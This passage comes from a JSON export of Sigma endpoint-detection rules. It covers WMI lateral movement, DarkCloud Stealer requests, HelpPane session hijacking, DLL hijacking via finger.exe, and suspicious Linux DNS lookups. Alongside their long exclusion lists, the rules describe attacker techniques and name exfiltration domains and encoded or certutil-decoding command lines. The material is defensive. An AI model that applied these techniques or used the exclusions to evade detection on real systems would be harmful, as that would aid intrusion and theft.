/c del %userprofile%\\discoRemote.cmd /F /Q'\n - 'cmd.exe /c %userprofile%\\discoRemote.cmd'\n - 'cmd.exe /c reg delete HKLM\\SOFTWARE\\Discovery-Tool /f'\n\n exclusion_legit:\n CommandLine:\n - 'powershell.exe -noprofile -noninteractive -Command Remove-NetTransportFilter -SettingName InternetCustom -Confirm:$false'\n - 'powershell.exe -noprofile -noninteractive -Command Set-NetTCPSetting -SettingName InternetCustom -CongestionProvider Default'\n\n exclusion_sysid:\n CommandLine:\n - 'cmd.exe /c mkdir ?:\\temp\\sysId'\n - 'cmd.exe /c del /s /q ?:\\Windows\\TEMP\\sysId'\n # cmd.exe /c C:\\temp\\sysId\\getSystemId.exe | find System ID >> C:\\temp\\sysId\\83d93175-6871-4871-b655-95a81df524e0.txt\n - 'cmd.exe /c ?:\\temp\\sysId\\getSystemId.exe | find System ID >> ?:\\temp\\sysId\\\\*'\n - 'cmd.exe /c rd /s /q ?:\\temp\\sysId'\n # cmd.exe /c mkdir C:\\Windows\\TEMP\\8a5849f41ed8\" && attrib +H C:\\Windows\\TEMP\\8a5849f41ed8\"\n - 'cmd.exe /c mkdir ?:\\Windows\\TEMP\\\\????????????\" && attrib +H ?:\\Windows\\TEMP\\\\????????????\"'\n - 'cmd.exe /c mkdir ?:\\Windows\\TEMP\\\\????????????\" && attrib +H ?:\\Windows\\TEMP\\\\????????????\"' # double space\n # cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Dell Computer Corporation\\iDRAC Service Module /s >> C:\\Windows\\TEMP\\\\ExtendedDID_ISM_Version_2022-11-15-05-39-30-094.txt\n - 'cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Dell Computer Corporation\\iDRAC Service Module /s >> ?:\\Windows\\TEMP\\\\*ExtendedDID_ISM_Version_*'\n - 'cmd.exe /c rmdir /S /Q ?:\\Windows\\TEMP\\\\*'\n # cmd.exe /c omreport storage controller -fmt xml -outc C:\\WINDOWS\\TEMP\\6c4ac9e37c5d\\cntrl.xml\n # cmd.exe /c omreport system esmlog -fmt xml -outc C:\\WINDOWS\\TEMP\\6c4ac9e37c5d\\ESMLog.xml\n - 'cmd.exe /c omreport * -outc *'\n - 'cmd.exe /c omreport.exe about'\n - 'cmd.exe /c iscli -pinfo'\n - 'cmd.exe /c iscli -i'\n - 'cmd.exe /c iscsicli ListInitiators'\n - 'cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Dell Computer Corporation\\OpenManage\\Applications\\SystemsManagement /s >> ?:\\WINDOWS\\TEMP\\\\*'\n - 'cmd.exe /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Dell Computer Corporation\\OpenManage\\Applications\\SystemsManagement /s >> ?:\\WINDOWS\\TEMP\\\\*'\n - 'cmd.exe /c driverquery'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*QlogicFCHBA_*'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*OSSummary_*'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*InstalledApplicationRegistry_*'\n - 'cmd.exe /c reg query * >> ?:\\WINDOWS\\TEMP\\\\*Windows_ISCSI_*'\n\n # cmd.exe /c C:\\WINDOWS\\TEMP\\6d43b83c43ef\\\\omsaRaidCntrlLogs.bat C:\\WINDOWS\\TEMP\\6d43b83c43ef\\\n - 'cmd.exe /c ?:\\WINDOWS\\TEMP\\\\*\\omsaRaidCntrlLogs.bat ?:\\WINDOWS\\TEMP\\\\*'\n - 'cmd.exe /c -enc=UTF-8 -outc=?:\\WINDOWS\\TEMP\\\\????????????\\Inventory.xml'\n\n exclusion_temp_gpupdate_task:\n CommandLine:\n - 'schtasks.exe /delete /f /tn Temp_GPUpdate_Task'\n - 'schtasks.exe /run /i /tn Temp_GPUpdate_Task'\n # schtasks.exe /create /RU xxx\\yyy /SC DAILY /SD 03/14/2023 /ST 00:02 /ED 03/15/2023 /Z /F /TN Temp_GPUpdate_Task /TR cmd /c echo N | gpupdate /force\n - 'schtasks.exe /create /RU * /TN Temp_GPUpdate_Task /TR cmd /c echo N | gpupdate /force'\n\n exclusion_csat:\n CommandLine:\n - 'cmd /c mkdir ?:\\windows\\Temp\\csat'\n - 'cmd /c rmdir ?:\\Windows\\Temp\\csat /q /s'\n - 'cmd /c ?:\\Windows\\Temp\\csat\\csat_dwnldr.exe * -f ?:\\Windows\\Temp\\csat\\csat.exe'\n - 'cmd /c echo *> ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.exe.config'\n - 'cmd /c echo *> ?:\\WINDOWS\\Temp\\csat\\csat.exe.config'\n - 'cmd /c echo *> ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.txt'\n - 'cmd /c certutil -f -decode ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.txt ?:\\WINDOWS\\Temp\\csat\\csat_dwnldr.exe'\n - '?:\\WINDOWS\\Temp\\csat\\csat.exe *ipv4=*'\n\n exclusion_commvault:\n Image|endswith: '\\CVMedia\\setup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n ProcessSigned: 'true'\n\n exclusion_nessus:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c *> ?:\\Windows\\TEMP\\nessus_*'\n\n exclusion_advancedauditpolicybackup:\n CommandLine: 'auditpol.exe /backup /file:?:\\Windows\\Temp\\AdvancedAuditPolicyBackup.csv'\n\n exclusion_veritas_backup:\n CommandLine|contains: '*\\strpimon.exe /k SOFTWARE\\Veritas\\SymcInstall /i setup.exe *; /DEST:?:\\Program Files\\Veritas\\Backup Exec'\n\n exclusion_fstmp:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\temp\\fstmp\\fs_action_*.bat'\n\n exclusion_schtasks_tmp_gpupdate:\n CommandLine: 'schtasks.exe /create * /TN Temp_GPUpdate_Task /TR cmd /c echo N | gpupdate /Target:User /force'\n\n exclusion_healthservicerestart:\n CommandLine|startswith: 'powershell.exe ?:\\Windows\\TEMP\\RestartHealthService.ps1'\n\n exclusion_nessus_ad_join:\n CommandLine|contains:\n # $joinInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ptrJoinInfo, [System.Type][NetAPI32+DSREG_JOIN_INFO]\n - 'JABqAG8AaQBuAEkAbgBmAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAHUAYwB0AHUAcgBlACgAJABwAHQAcgBKAG8AaQBuAEkAbgBmAG8ALAAgAFsAUwB5AHMAdABlAG0ALgBUAHkAcABlAF0AWwBOAGUAdABBAFAASQAzADIAKwBEAFMAUgBFAEcAXwBKAE8ASQBOAF8ASQBOAEYATwBdACkA'\n - 'QAagBvAGkAbgBJAG4AZgBvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AFAAdAByAFQAbwBTAHQAcgB1AGMAdAB1AHIAZQAoACQAcAB0AHIASgBvAGkAbgBJAG4AZgBvACwAIABbAFMAeQBzAHQAZQBtAC4AVAB5AHAAZQBdAFsATgBlAHQAQQBQAEkAMwAyACsARABTAFIARQBHAF8ASgBPAEkATgBfAEkATgBGAE8AXQApA'\n - 'kAGoAbwBpAG4ASQBuAGYAbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBQAHQAcgBUAG8AUwB0AHIAdQBjAHQAdQByAGUAKAAkAHAAdAByAEoAbwBpAG4ASQBuAGYAbwAsACAAWwBTAHkAcwB0AGUAbQAuAFQAeQBwAGUAXQBbAE4AZQB0AEEAUABJADMAMgArAEQAUwBSAEUARwBfAEoATwBJAE4AXwBJAE4ARgBPAF0AKQ'\n\n exclusion_vcredist:\n CommandLine|endswith:\n - '\\vc-redist-x*.exe /quiet /norestart'\n - '\\vc_redist-x*.exe /quiet /norestart'\n - '\\vc_redist.x*.exe /q /norestart'\n - '\\vc-redist.x*.exe /q /norestart'\n\n exclusion_pwsh_installer:\n CommandLine|endswith: 'powershell.exe -windowstyle hidden *\\Installer-APPS.ps1 -PackageType * -PackageName * -PackageVersion *'\n\n exclusion_uninstall_package_cache:\n CommandLine: 'cmd.exe /c for /r ?:\\ProgramData\\Package Cache* a a /uninstall /quiet /norestart AP_UNINSTALL_CODE=*'\n\n exclusion_evolucare_1:\n Image|endswith: '\\NginxGateway.exe'\n Company: 'Evolucare'\n Product: 'Ecs.Registry.NginxGateway.Console'\n\n exclusion_evolucare_2:\n CommandLine|contains: '\\\\*-*-*-*-*.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /DIR=*\\Evolucare\\'\n\n exclusion_fortinet:\n CommandLine|endswith: 'x64_FortiClient_EMS_*_Installer.ps1'\n\n exclusion_vagrant:\n CommandLine|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand'\n User|endswith: '\\vagrant'\n\n # Siemens Healthcare GmbH\n exclusion_siemens:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\SysMgmt\\service\\mwtools\\SD_Installer_Start.cmd'\n\n exclusion_arcgis:\n CommandLine|contains:\n - 'sc.exe qc Portal for ArcGIS'\n - '\\Portal_for_ArcGIS_Windows'\n - '\\ArcGIS_Server_Windows'\n\n #trap {\n # $wrapper_path = \"$($env:TEMP)\\ansible-async-wrapper-error-\n exclusion_ansible_powershell:\n Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'IAAgACAAIAB0AHIAYQBwACAAewAKACAAIAAgACAAIAAgACAAIAAkAHcAcgBhAHAAcABlAHIAXwBwAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBUAEUATQBQACkAXABhAG4AcwBpAGIAbABlAC0AYQBzAHkAbgBjAC0AdwByAGEAcABwAGUAcgAtAGUAcgByAG8AcgAtA'\n - 'AAIAAgACAAdAByAGEAcAAgAHsACgAgACAAIAAgACAAIAAgACAAJAB3AHIAYQBwAHAAZQByAF8AcABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoAVABFAE0AUAApAFwAYQBuAHMAaQBiAGwAZQAtAGEAcwB5AG4AYwAtAHcAcgBhAHAAcABlAHIALQBlAHIAcgBvAHIALQ'\n - 'gACAAIAAgAHQAcgBhAHAAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAdwByAGEAcABwAGUAcgBfAHAAYQB0AGgAIAA9ACAAIgAkACgAJABlAG4AdgA6AFQARQBNAFAAKQBcAGEAbgBzAGkAYgBsAGUALQBhAHMAeQBuAGMALQB3AHIAYQBwAHAAZQByAC0AZQByAHIAbwByAC0A'\n\n exclusion_servicenow:\n CommandLine|contains:\n - '> \\\\\\\\127.0.0.1\\c$\\temp\\\\*\\psscript_output_*.txt 2>&1'\n - '2>\\\\\\\\127.0.0.1\\admin$\\temp\\psscript_err_*.txt'\n\n exclusion_tenable:\n CommandLine|contains|all:\n - 'sc.exe start tenable_mw_scan'\n - 'output=nessus_'\n\n exclusion_scc:\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\SCC-Remote\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61760ce9-0e79-4360-81e4-a0c50dab9c8c",
"rule_name": "Possible Lateral Movement via WMI",
"rule_description": "Detects processes spawned by the Windows Management Instrumentation (WMI) service, specifically when the parent process is \"wmiprvse.exe\".\nWMI is a legitimate management tool used for system administration, but attackers may abuse this mechanism for lateral movement, persistence, or to execute malicious commands. This rule focuses on detecting potentially malicious use by monitoring the spawned processes.\nIt is recommended to review the actions of the child processes to identify any suspicious activities and to verify if the processes align with legitimate management tasks.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1059.001",
"attack.t1059.005",
"attack.t1059.007",
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61825073-0741-4211-93c9-8a32e4455793",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603202Z",
"creation_date": "2026-03-23T11:45:34.603205Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603213Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/",
"https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/"
],
"name": "t1071_001_darkcloud_stealer_url_request.yml",
"content": "title: URL Request Related to DarkCloud Stealer\nid: 61825073-0741-4211-93c9-8a32e4455793\ndescription: |\n Detects URL requests with a specific User-Agent associated with the DarkCloud Stealer.\n DarkCloud is a Windows-based information stealer, that was first identified in 2022, known for stealing passwords, banking details, and other sensitive data.\n Is is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\nreferences:\n - https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/\n - https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/\ndate: 2025/08/25\nmodified: 2025/09/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Stealer.DarkCloud\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n UserAgent: 'Project1'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61825073-0741-4211-93c9-8a32e4455793",
"rule_name": "URL Request Related to DarkCloud Stealer",
"rule_description": "Detects URL requests with a specific User-Agent associated with the DarkCloud Stealer.\nDarkCloud is a Windows-based information stealer, that was first identified in 2022, known for stealing passwords, banking details, and other sensitive data.\nIs is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-09-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6199a4d5-4143-4df6-a486-94005a5bb643",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625714Z",
"creation_date": "2026-03-23T11:45:34.625717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625721Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d",
"https://github.com/3lp4tr0n/SessionHop/",
"https://projectzero.google/2016/01/raising-dead.html",
"https://attack.mitre.org/techniques/T1656/"
],
"name": "t1656_helppane_server_execution.yml",
"content": "title: Suspicious Process Execution via HelpPane Server\nid: 6199a4d5-4143-4df6-a486-94005a5bb643\ndescription: |\n Detects suspicious child process execution by HelpPane server.\n Threat actors can abuse the IHxHelpPaneServer COM object, configured to run as an Interactive User, to hijack specified user sessions.\n This session hijacking technique is an alternative to remote process injection or dumping lsass, and may come in handy when operators need to keylog, screenshot, or access LDAP as the affected user.\n It is recommended to check the process created for suspicious activities.\nreferences:\n - https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d\n - https://github.com/3lp4tr0n/SessionHop/\n - https://projectzero.google/2016/01/raising-dead.html\n - https://attack.mitre.org/techniques/T1656/\ndate: 2025/12/11\nmodified: 2025/12/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1656\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\helppane.exe -Embedding'\n\n filter_web_browsers:\n - ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'DuckDuckGo.exe'\n - 'AvastBrowser.exe'\n - 'BrowserSelector.exe'\n - 'CCleanerBrowser.exe'\n - ProcessCommandLine|contains: 'https://go.microsoft.com/fwlink/?LinkId'\n\n filter_image:\n Image:\n - '?:\\Windows\\HelpPane.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\taskmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgate.exe'\n - '?:\\Program Files\\WindowsApps\\Microsoft.GetHelp_*\\GetHelp.exe'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6199a4d5-4143-4df6-a486-94005a5bb643",
"rule_name": "Suspicious Process Execution via HelpPane Server",
"rule_description": "Detects suspicious child process execution by HelpPane server.\nThreat actors can abuse the IHxHelpPaneServer COM object, configured to run as an Interactive User, to hijack specified user sessions.\nThis session hijacking technique is an alternative to remote process injection or dumping lsass, and may come in handy when operators need to keylog, screenshot, or access LDAP as the affected user.\nIt is recommended to check the process created for suspicious activities.\n",
"rule_creation_date": "2025-12-11",
"rule_modified_date": "2025-12-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1656"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61a4909c-c5a7-41e6-8b80-4e682f09d4ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097109Z",
"creation_date": "2026-03-23T11:45:34.097111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097116Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_finger.yml",
"content": "title: DLL Hijacking via finger.exe\nid: 61a4909c-c5a7-41e6-8b80-4e682f09d4ae\ndescription: |\n Detects potential Windows DLL Hijacking via finger.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'finger.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61a4909c-c5a7-41e6-8b80-4e682f09d4ae",
"rule_name": "DLL Hijacking via finger.exe",
"rule_description": "Detects potential Windows DLL Hijacking via finger.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61a74a91-1f17-4c6d-a936-40478cbc9e21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626986Z",
"creation_date": "2026-03-23T11:45:34.626989Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626993Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1090/004/",
"https://attack.mitre.org/techniques/T1048/003/"
],
"name": "t1102_002_susp_domain_dns_linux.yml",
"content": "title: Suspicious Domain Name Resolved (Linux)\nid: 61a74a91-1f17-4c6d-a936-40478cbc9e21\ndescription: |\n Detects a DNS resolution by an uncommon process to web services commonly used by attackers to exfiltrate or download malicious binaries.\n Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\n It is recommended to check if the process has legitimate reason to communicate with the service.\nreferences:\n - https://www.vincentyiu.com/red-team/domain-fronting/trycloudflare-infrastructure-and-domain-fronting\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1090/004/\n - https://attack.mitre.org/techniques/T1048/003/\ndate: 2024/09/10\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1090.004\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.Exfiltration\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n QueryName|endswith:\n - '.trycloudflare.com'\n - '.pages.dev'\n - '.w3spaces.com'\n - '.workers.dev'\n ProcessImage|contains: '?'\n\n exclusion_dns_server:\n ProcessImage:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n - '/usr/local/nessy2/bin/named'\n\n exclusion_proxy:\n ProcessImage:\n - '/usr/sbin/squid'\n - '/usr/sbin/squid-gnutls'\n - '*/traefik'\n - '/usr/bin/traffic_server'\n\n exclusion_misc:\n ProcessImage: '/usr/sbin/samba'\n\n exclusion_browser:\n ProcessImage|endswith:\n - '/firefox-esr'\n - '/firefox-bin'\n - '/firefox'\n - '/waterfox'\n - '/msedge'\n - '/chrome'\n - '/librewolf'\n - '/chromium'\n - '/chromium-browser'\n - '/thorium'\n - '/brave'\n - '/vivaldi-bin'\n - '/xdg-desktop-portal'\n - '/opera'\n\n exclusion_mailer:\n - ProcessCommandLine:\n - '/usr/bin/perl -T /usr/sbin/amavisd*'\n - '/usr/sbin/amavisd-new (master)'\n - 'MailScanner: starting child'\n - '/opt/zimbra/common/sbin/amavisd (master)'\n - '/usr/sbin/amavisd (master)'\n - ProcessParentCommandLine: '/usr/sbin/amavisd (master)'\n\n exclusion_ublock:\n QueryName:\n - 'ublockorigin.pages.dev'\n - 'malware-filter.pages.dev'\n - 'phishing-filter.pages.dev'\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/opt/zen/zen'\n - '/home/*/.local/bin/zen-folder/zen'\n - '/opt/Rocket.Chat/rocketchat-desktop'\n - '/usr/libexec/gvfsd-http'\n - '/opt/stremio/stremio'\n - '/usr/bin/dig'\n - '/usr/local/lib/qutebrowser/.venv/bin/python3'\n\n exclusion_ancestors:\n ProcessAncestors|contains: '|/usr/share/code/code|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61a74a91-1f17-4c6d-a936-40478cbc9e21",
"rule_name": "Suspicious Domain Name Resolved (Linux)",
"rule_description": "Detects a DNS resolution by an uncommon process to web services commonly used by attackers to exfiltrate or download malicious binaries.\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.\nIt is recommended to check if the process has legitimate reason to communicate with the service.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2026-02-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004",
"attack.t1090.004",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61ae1266-56f1-4aa8-82e3-d1b2ba0b3aae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
